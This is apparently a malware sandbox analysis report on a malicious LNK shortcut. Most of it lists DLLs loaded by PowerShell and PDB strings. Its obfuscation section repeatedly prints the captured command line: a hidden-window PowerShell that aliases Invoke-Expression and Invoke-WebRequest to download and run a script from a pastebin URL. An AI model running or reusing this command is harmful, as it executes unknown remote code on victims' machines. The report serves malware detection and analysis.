Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.0.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000007.00000002.1868361075.000001D219EFC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbd source: powershell.exe, 00000007.00000002.1868361075.000001D219EFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbD source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1868361075.000001D219EFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A3B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1868361075.000001D219F7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1870622695.000001D27FB39000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000007.00000002.1868361075.000001D219EFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbL source: powershell.exe, 00000007.00000002.1868361075.000001D219F47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1868361075.000001D219F47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A3B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.1869904886.000001D219F9F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbint16Ch& source: powershell.exe, 00000007.00000002.1868361075.000001D219F7C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb" source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvicec source: powershell.exe, 00000007.00000002.1868361075.000001D219EFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717033801.0000027120800000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1867832997.000001D219D8C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb41e source: powershell.exe, 00000007.00000002.1868361075.000001D219F7C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1717033801.0000027120838000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb' source: powershell.exe, 00000007.00000002.1868361075.000001D219EFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1718694511.0000027120AF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1867832997.000001D219D8C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: agement.Automation.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbf source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1718694511.0000027120A3B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.1869904886.000001D219F9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089> source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb00100010007d1fa57c4aed9f0a32e84aa0faefd0de9e8fd6aec8f87fb03766c834c99921eb23be79ad9d5dcc1dd9ad236132102900b723cf980957fc4e177108fc607774f29e8320e92ea05ece4e821c0a5efe8f1645c4c0c93c1ab99285d622caa652c1dfad63d745d6f2de5f17e5eaf0fc4 source: powershell.exe, 00000007.00000002.1869904886.000001D219F9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbi source: powershell.exe, 0000000C.00000002.1964099046.0000020ADDA36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1868361075.000001D219F7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 00000000.00000002.1717033801.000002712088A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1868361075.000001D219F7C000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
